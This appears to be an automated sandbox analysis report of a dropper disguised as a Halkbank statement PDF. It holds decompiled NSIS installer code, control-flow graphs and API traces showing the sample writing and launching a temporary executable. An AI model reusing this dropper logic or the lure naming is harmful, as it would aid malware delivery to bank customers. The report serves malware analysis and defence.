                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 2803837635-469744702
                                                                    • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                    • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                    • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                    • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                                    C-Code - Quality: 77%
                                                                    			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                    				void* __esi;
                                                                    				void* _t35;
                                                                    				void* _t43;
                                                                    				void* _t45;
                                                                    				FILETIME* _t51;
                                                                    				FILETIME* _t64;
                                                                    				void* _t66;
                                                                    				signed int _t72;
                                                                    				FILETIME* _t73;
                                                                    				FILETIME* _t77;
                                                                    				signed int _t79;
                                                                    				WCHAR* _t81;
                                                                    				void* _t83;
                                                                    				void* _t84;
                                                                    				void* _t86;
                                                                    
                                                                    				_t77 = __ebx;
                                                                    				 *(_t86 - 8) = E00402DA6(0x31);
                                                                    				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                    				_t35 = E00405FAE( *(_t86 - 8));
                                                                    				_push( *(_t86 - 8));
                                                                    				_t81 = L"\"C:\\";
                                                                    				if(_t35 == 0) {
                                                                    					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
                                                                    				} else {
                                                                    					E00406668();
                                                                    				}
                                                                    				E004068EF(_t81);
                                                                    				while(1) {
                                                                    					__eflags =  *(_t86 + 8) - 3;
                                                                    					if( *(_t86 + 8) >= 3) {
                                                                    						_t66 = E0040699E(_t81);
                                                                    						_t79 = 0;
                                                                    						__eflags = _t66 - _t77;
                                                                    						if(_t66 != _t77) {
                                                                    							_t73 = _t66 + 0x14;
                                                                    							__eflags = _t73;
                                                                    							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                    						}
                                                                    						asm("sbb eax, eax");
                                                                    						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                    						__eflags = _t72;
                                                                    						 *(_t86 + 8) = _t72;
                                                                    					}
                                                                    					__eflags =  *(_t86 + 8) - _t77;
                                                                    					if( *(_t86 + 8) == _t77) {
                                                                    						E00406133(_t81);
                                                                    					}
                                                                    					__eflags =  *(_t86 + 8) - 1;
                                                                    					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                    					__eflags = _t43 - 0xffffffff;
                                                                    					 *(_t86 - 0x38) = _t43;
                                                                    					if(_t43 != 0xffffffff) {
                                                                    						break;
                                                                    					}
                                                                    					__eflags =  *(_t86 + 8) - _t77;
                                                                    					if( *(_t86 + 8) != _t77) {
                                                                    						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                                    						__eflags =  *(_t86 + 8) - 2;
                                                                    						if(__eflags == 0) {
                                                                    							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                    						}
                                                                    						L31:
                                                                    						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                                    						__eflags =  *0x42a2e8;
                                                                    						goto L32;
                                                                    					} else {
                                                                    						E00406668(0x40b5f8, _t83);
                                                                    						E00406668(_t83, _t81);
                                                                    						E004066A5(_t77, _t81, _t83, "C:\Users\alfons\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                    						E00406668(_t83, 0x40b5f8);
                                                                    						_t64 = E00405CC8("C:\Users\alfons\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                                                    						__eflags = _t64;
                                                                    						if(_t64 == 0) {
                                                                    							continue;
                                                                    						} else {
                                                                    							__eflags = _t64 == 1;
                                                                    							if(_t64 == 1) {
                                                                    								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                                    								L32:
                                                                    								_t51 = 0;
                                                                    								__eflags = 0;
                                                                    							} else {
                                                                    								_push(_t81);
                                                                    								_push(0xfffffffa);
                                                                    								E004056CA();
                                                                    								L29:
                                                                    								_t51 = 0x7fffffff;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					L33:
                                                                    					return _t51;
                                                                    				}
                                                                    				E004056CA(0xffffffea,  *(_t86 - 8));
                                                                    				 *0x42a314 =  *0x42a314 + 1;
                                                                    				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                    				 *0x42a314 =  *0x42a314 - 1;
                                                                    				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                    				_t84 = _t45;
                                                                    				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                    					L22:
                                                                    					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                    				} else {
                                                                    					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                    					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                    						goto L22;
                                                                    					}
                                                                    				}
                                                                    				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                                    				__eflags = _t84 - _t77;
                                                                    				if(_t84 >= _t77) {
                                                                    					goto L31;
                                                                    				} else {
                                                                    					__eflags = _t84 - 0xfffffffe;
                                                                    					if(_t84 != 0xfffffffe) {
                                                                    						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                    					} else {
                                                                    						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                    						lstrcatW(_t81,  *(_t86 - 8));
                                                                    					}
                                                                    					_push(0x200010);
                                                                    					_push(_t81);
                                                                    					E00405CC8();
                                                                    					goto L29;
                                                                    				}
                                                                    				goto L33;
                                                                    			}


















                                                                    0x0040176f
                                                                    0x00401776
                                                                    0x00401782
                                                                    0x00401785
                                                                    0x0040178a
                                                                    0x0040178d
                                                                    0x00401794
                                                                    0x004017b0
                                                                    0x00401796
                                                                    0x00401797
                                                                    0x00401797
                                                                    0x004017b6
                                                                    0x004017bb
                                                                    0x004017bb
                                                                    0x004017bf
                                                                    0x004017c2
                                                                    0x004017c7
                                                                    0x004017c9
                                                                    0x004017cb
                                                                    0x004017d0
                                                                    0x004017d0
                                                                    0x004017db
                                                                    0x004017db
                                                                    0x004017ec
                                                                    0x004017ee
                                                                    0x004017ee
                                                                    0x004017ef
                                                                    0x004017ef
                                                                    0x004017f2
                                                                    0x004017f5
                                                                    0x004017f8
                                                                    0x004017f8
                                                                    0x004017ff
                                                                    0x0040180e
                                                                    0x00401813
                                                                    0x00401816
                                                                    0x00401819
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040181b
                                                                    0x0040181e
                                                                    0x00401874
                                                                    0x00401879
                                                                    0x004015b6
                                                                    0x0040292e
                                                                    0x0040292e
                                                                    0x00402c2a
                                                                    0x00402c2d
                                                                    0x00402c2d
                                                                    0x00000000
                                                                    0x00401820
                                                                    0x00401826
                                                                    0x0040182d
                                                                    0x0040183a
                                                                    0x00401845
                                                                    0x0040185b
                                                                    0x0040185b
                                                                    0x0040185e
                                                                    0x00000000
                                                                    0x00401864
                                                                    0x00401864
                                                                    0x00401865
                                                                    0x00401882
                                                                    0x00402c33
                                                                    0x00402c33
                                                                    0x00402c33
                                                                    0x00401867
                                                                    0x00401867
                                                                    0x00401868
                                                                    0x00401493
                                                                    0x0040239d
                                                                    0x0040239d
                                                                    0x0040239d
                                                                    0x00401865
                                                                    0x0040185e
                                                                    0x00402c35
                                                                    0x00402c39
                                                                    0x00402c39
                                                                    0x00401892
                                                                    0x00401897
                                                                    0x004018a5
                                                                    0x004018aa
                                                                    0x004018b0
                                                                    0x004018b4
                                                                    0x004018b6
                                                                    0x004018be
                                                                    0x004018ca
                                                                    0x004018b8
                                                                    0x004018b8
                                                                    0x004018bc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004018bc
                                                                    0x004018d3
                                                                    0x004018d9
                                                                    0x004018db
                                                                    0x00000000
                                                                    0x004018e1
                                                                    0x004018e1
                                                                    0x004018e4
                                                                    0x004018fc
                                                                    0x004018e6
                                                                    0x004018e9
                                                                    0x004018f2
                                                                    0x004018f2
                                                                    0x00401901
                                                                    0x00401906
                                                                    0x00402398
                                                                    0x00000000
                                                                    0x00402398
                                                                    0x00000000

                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                    • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,00000000,00000000,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                                    • API String ID: 1941528284-1770994736
                                                                    • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                    • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                    • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                    • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                                    C-Code - Quality: 100%
                                                                    			E004069C5(intOrPtr _a4) {
                                                                    				short _v576;
                                                                    				signed int _t13;
                                                                    				struct HINSTANCE__* _t17;
                                                                    				signed int _t19;
                                                                    				void* _t24;
                                                                    
                                                                    				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                    				if(_t13 > 0x104) {
                                                                    					_t13 = 0;
                                                                    				}
                                                                    				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                    					_t19 = 1;
                                                                    				} else {
                                                                    					_t19 = 0;
                                                                    				}
                                                                    				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                    				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                    				return _t17;
                                                                    			}








                                                                    0x004069dc
                                                                    0x004069e5
                                                                    0x004069e7
                                                                    0x004069e7
                                                                    0x004069eb
                                                                    0x004069fe
                                                                    0x004069f8
                                                                    0x004069f8
                                                                    0x004069f8
                                                                    0x00406a17
                                                                    0x00406a2b
                                                                    0x00406a32

                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                    • wsprintfW.USER32 ref: 00406A17
                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                    • API String ID: 2200240437-1946221925
                                                                    • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                    • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                    • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                    • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                                    C-Code - Quality: 100%
                                                                    			E00405B99(WCHAR* _a4) {
                                                                    				struct _SECURITY_ATTRIBUTES _v16;
                                                                    				struct _SECURITY_DESCRIPTOR _v36;
                                                                    				int _t22;
                                                                    				long _t23;
                                                                    
                                                                    				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                    				_v36.Owner = 0x4083f8;
                                                                    				_v36.Group = 0x4083f8;
                                                                    				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                    				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                    				_v16.lpSecurityDescriptor =  &_v36;
                                                                    				_v36.Revision = 1;
                                                                    				_v36.Control = 4;
                                                                    				_v36.Dacl = 0x4083e8;
                                                                    				_v16.nLength = 0xc;
                                                                    				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                    				if(_t22 != 0) {
                                                                    					L1:
                                                                    					return 0;
                                                                    				}
                                                                    				_t23 = GetLastError();
                                                                    				if(_t23 == 0xb7) {
                                                                    					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                    						goto L1;
                                                                    					}
                                                                    					return GetLastError();
                                                                    				}
                                                                    				return _t23;
                                                                    			}







                                                                    0x00405ba4
                                                                    0x00405ba8
                                                                    0x00405bab
                                                                    0x00405bb1
                                                                    0x00405bb5
                                                                    0x00405bb9
                                                                    0x00405bc1
                                                                    0x00405bc8
                                                                    0x00405bce
                                                                    0x00405bd5
                                                                    0x00405bdc
                                                                    0x00405be4
                                                                    0x00405be6
                                                                    0x00000000
                                                                    0x00405be6
                                                                    0x00405bf0
                                                                    0x00405bf7
                                                                    0x00405c0d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405c0f
                                                                    0x00405c13

                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                    • GetLastError.KERNEL32 ref: 00405BF0
                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                    • GetLastError.KERNEL32 ref: 00405C0F
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 3449924974-823278215
                                                                    • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                    • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                    • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                    • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 538 403479-4034a1 GetTickCount 539 4035d1-4035d9 call 40302e 538->539 540 4034a7-4034d2 call 4035f8 SetFilePointer 538->540 545 4035db-4035df 539->545 546 4034d7-4034e9 540->546 547 4034eb 546->547 548 4034ed-4034fb call 4035e2 546->548 547->548 551 403501-40350d 548->551 552 4035c3-4035c6 548->552 553 403513-403519 551->553 552->545 554 403544-403560 call 406bb0 553->554 555 40351b-403521 553->555 561 403562-40356a 554->561 562 4035cc 554->562 555->554 556 403523-403543 call 40302e 555->556 556->554 564 40356c-403574 call 40620a 561->564 565 40358d-403593 561->565 563 4035ce-4035cf 562->563 563->545 569 403579-40357b 564->569 565->562 566 403595-403597 565->566 566->562 568 403599-4035ac 566->568 568->546 570 4035b2-4035c1 SetFilePointer 568->570 571 4035c8-4035ca 569->571 572 40357d-403589 569->572 570->539 571->563 572->553 573 40358b 572->573 573->568
                                                                    C-Code - Quality: 93%
                                                                    			E00403479(intOrPtr _a4) {
                                                                    				intOrPtr _t11;
                                                                    				signed int _t12;
                                                                    				void* _t14;
                                                                    				void* _t15;
                                                                    				long _t16;
                                                                    				void* _t18;
                                                                    				intOrPtr _t31;
                                                                    				intOrPtr _t34;
                                                                    				intOrPtr _t36;
                                                                    				void* _t37;
                                                                    				intOrPtr _t49;
                                                                    
                                                                    				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                                                                    				 *0x42a26c = GetTickCount() + 0x1f4;
                                                                    				if(_t34 <= 0) {
                                                                    					L22:
                                                                    					E0040302E(1);
                                                                    					return 0;
                                                                    				}
                                                                    				E004035F8( *0x420f04);
                                                                    				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                                    				 *0x420f00 = _t34;
                                                                    				 *0x420ef0 = 0;
                                                                    				while(1) {
                                                                    					_t31 = 0x4000;
                                                                    					_t11 =  *0x420ef8 -  *0x420f04;
                                                                    					if(_t11 <= 0x4000) {
                                                                    						_t31 = _t11;
                                                                    					}
                                                                    					_t12 = E004035E2(0x414ef0, _t31);
                                                                    					if(_t12 == 0) {
                                                                    						break;
                                                                    					}
                                                                    					 *0x420f04 =  *0x420f04 + _t31;
                                                                    					 *0x40ce80 = 0x414ef0;
                                                                    					 *0x40ce84 = _t31;
                                                                    					L6:
                                                                    					L6:
                                                                    					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                                    						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                                    						E0040302E(0);
                                                                    					}
                                                                    					 *0x40ce88 = 0x40cef0;
                                                                    					 *0x40ce8c = 0x8000; // executed
                                                                    					_t14 = E00406BB0(0x40ce68); // executed
                                                                    					if(_t14 < 0) {
                                                                    						goto L20;
                                                                    					}
                                                                    					_t36 =  *0x40ce88; // 0x413d44
                                                                    					_t37 = _t36 - 0x40cef0;
                                                                    					if(_t37 == 0) {
                                                                    						__eflags =  *0x40ce84; // 0x0
                                                                    						if(__eflags != 0) {
                                                                    							goto L20;
                                                                    						}
                                                                    						__eflags = _t31;
                                                                    						if(_t31 == 0) {
                                                                    							goto L20;
                                                                    						}
                                                                    						L16:
                                                                    						_t16 =  *0x420ef4;
                                                                    						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                                    							continue;
                                                                    						}
                                                                    						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                    						goto L22;
                                                                    					}
                                                                    					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                                    					if(_t18 == 0) {
                                                                    						_push(0xfffffffe);
                                                                    						L21:
                                                                    						_pop(_t15);
                                                                    						return _t15;
                                                                    					}
                                                                    					 *0x40ce60 =  *0x40ce60 + _t37;
                                                                    					_t49 =  *0x40ce84; // 0x0
                                                                    					if(_t49 != 0) {
                                                                    						goto L6;
                                                                    					}
                                                                    					goto L16;
                                                                    					L20:
                                                                    					_push(0xfffffffd);
                                                                    					goto L21;
                                                                    				}
                                                                    				return _t12 | 0xffffffff;
                                                                    			}














                                                                    0x00403489
                                                                    0x0040349c
                                                                    0x004034a1
                                                                    0x004035d1
                                                                    0x004035d3
                                                                    0x00000000
                                                                    0x004035d9
                                                                    0x004034ad
                                                                    0x004034c0
                                                                    0x004034c6
                                                                    0x004034cc
                                                                    0x004034d7
                                                                    0x004034dc
                                                                    0x004034e1
                                                                    0x004034e9
                                                                    0x004034eb
                                                                    0x004034eb
                                                                    0x004034f4
                                                                    0x004034fb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403501
                                                                    0x00403507
                                                                    0x0040350d
                                                                    0x00000000
                                                                    0x00403513
                                                                    0x00403519
                                                                    0x00403539
                                                                    0x0040353e
                                                                    0x00403543
                                                                    0x00403549
                                                                    0x0040354f
                                                                    0x00403559
                                                                    0x00403560
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403562
                                                                    0x00403568
                                                                    0x0040356a
                                                                    0x0040358d
                                                                    0x00403593
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403595
                                                                    0x00403597
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403599
                                                                    0x00403599
                                                                    0x004035ac
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004035bb
                                                                    0x00000000
                                                                    0x004035bb
                                                                    0x00403574
                                                                    0x0040357b
                                                                    0x004035c8
                                                                    0x004035ce
                                                                    0x004035ce
                                                                    0x00000000
                                                                    0x004035ce
                                                                    0x0040357d
                                                                    0x00403583
                                                                    0x00403589
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004035cc
                                                                    0x004035cc
                                                                    0x00000000
                                                                    0x004035cc
                                                                    0x00000000

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040348D
                                                                      • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
